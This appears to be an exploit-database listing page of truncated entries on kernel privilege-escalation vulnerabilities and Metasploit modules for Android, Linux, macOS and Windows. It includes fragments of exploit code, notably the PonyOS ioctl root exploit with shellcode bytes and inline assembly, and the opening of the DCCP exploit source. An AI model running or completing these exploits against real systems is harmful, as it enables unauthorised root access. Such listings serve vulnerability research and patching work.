Android Stagefright MP4 tx3g Integer Overflow Exploit
This Metasploit module exploits an integer overflow vulnerability in the Stagefright library libstagefright.so. The vulnerability occurs when parsing specially crafted MP4 files. While a wide variety of remote attack vectors exist, this particular exploit is designed to work within an HTML5...
Android Stagefright MP4 tx3g Integer Overflow
This module exploits an integer overflow vulnerability in the Stagefright library libstagefright.so. The vulnerability occurs when parsing specially crafted MP4 files. While a wide variety of remote attack vectors exist, this particular exploit is designed to work within an HTML5 compliant browse...
Windows 8.1 kernel exploit: CVE-2014-4113 vulnerability analysis - vulnerability warning - the black bar safety net
1. Case description: On October 14, 2014, CrowdStrike and FireEye, two IT companies, each published a blog post in which they introduced a new kernel privilege escalation vulnerability in Windows-based systems. CrowdStrike mentioned in its article that they...
CVE-2016-4997
The compat IPT_SO_SET_REPLACE and IP6T_SO_SET_REPLACE setsockopt implementations in the netfilter subsystem in the Linux kernel before 4.6.3 allow local users to gain privileges or cause a denial of service (memory corruption) by leveraging in-container root access to provide a crafted offset value that...
Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in IOAudioEngine
Exploit for macOS platform in category dos / poc / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=776 IOAudioEngineUserClient::closeClient sets the audioEngine member pointer to NULL IOReturn IOAudioEngineUserClient::closeClient audioDebugIOLog3, "+...
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=809 Most things in the kernel use 32-bit reference counters, relying on the fact that the memory constraints of real computers make it impossible to create enough references to overflow the counters. There are exceptions for things...
CVE-2016-2069
Race condition in arch/x86/mm/tlb.c in the Linux kernel before 4.4.1 allows local users to gain privileges by triggering access to a paging structure by a different CPU...
Apple Mac OSX / iOS - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overfl
Exploit for multiple platform in category dos / poc / Source: https://code.google.com/p/google-security-research/issues/detail?id=543 NKE control sockets are documented here: https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/NKEConceptual/control/control.html By default ther...
PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit
Exploit for linux platform in category local exploits Exploit Title: PonyOS include include int main struct winsize ws; printf"+ PonyOS = 3.0 ioctl local root exploit\n"; memcpy&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8; ioctl0, TIOCSWINSZ, &ws; ioctl0, TIOCGWINSZ, void 0x0010f101; printf"- patched...
Linux Kernel (PonyOS 3.0) - TTY 'ioctl()' Local Privilege Escalation
/ Exploit Title: PonyOS include include int main struct winsize ws; printf"+ PonyOS = 3.0 ioctl local root exploit\n"; memcpy&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8; ioctl0, TIOCSWINSZ, &ws; ioctl0, TIOCGWINSZ, void 0x0010f101; printf"- patched syssetuid\n"; asm"movl $0x18,%eax"; asm"xorl...
CVE-2014-9683
Off-by-one error in the ecryptfs_decode_from_filename function in fs/ecryptfs/crypto.c in the eCryptfs subsystem in the Linux kernel before 3.18.2 allows local users to cause a denial of service (buffer overflow and system crash) or possibly gain privileges via a crafted filename...
Android Futex Requeue Kernel Exploit
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' class Metasploit4 'Android futex requeue...
Android 'Towelroot' Futex Requeue Kernel Exploit
This module exploits a bug in futex_requeue in the Linux kernel, using similar techniques employed by the towelroot exploit. Any Android device with a kernel built before June 2014 is likely to be vulnerable. This module requires Metasploit: https://metasploit.com/download Current source:...
Amazon Linux AMI : kernel (ALAS-2014-363)
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification. (C) Tenable Network Security, Inc...
Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (working)
No description provided by source. / hatorihanzo.c Linux kernel do_brk vma overflow exploit. The bug was found by Paul "IhaQueR" Starzetz [email protected] Further research and exploit development by Wojciech Purczynski [email protected] and Paul Starzetz. (c) 2003 Copyright by IhaQueR and cliph. All Rights...
Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
No description provided by source. / american-sign-language.c Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation Jon Oberheide [email protected] http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347 This custom_method file allows one to inject...
Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit (2)
No description provided by source. #include <netinet/in.h> #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <sys/mman.h> #include <linux/net.h> #define BUFSIZE 0x10000000 int main(int argc, char **argv) { void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE...
Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit
No description provided by source. / safecentral-unharden-v2.c Copyright (c) 2009 by [email protected] Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit by mu-b - Thu 3 Sep 2009 - Tested on: shdrv.sys 2.0.0.146 Compile: MinGW + -lntdll - Private Source Code - DO NOT DISTRIBU...
Linux Kernel 2.6.x pipe.c Local Privilege Escalation Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/36901/info Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges...
Linux Kernel 2.6 < 2.6.19 - (32bit) ip_append_data() ring0 Root Exploit
No description provided by source. / 0x82-CVE-2009-2698 Linux kernel 2.6 < 2.6.19 32bit ip_append_data local ring0 root exploit Tested: White Box 4 (2.6.9-5.ELsmp), CentOS 4.4 (2.6.9-42.ELsmp), CentOS 4.5 (2.6.9-55.ELsmp), Fedora Core 4 (2.6.11-1.1369_FC4smp), Fedora Core 5 (2.6.15-1.2054_FC5), Fedora Core...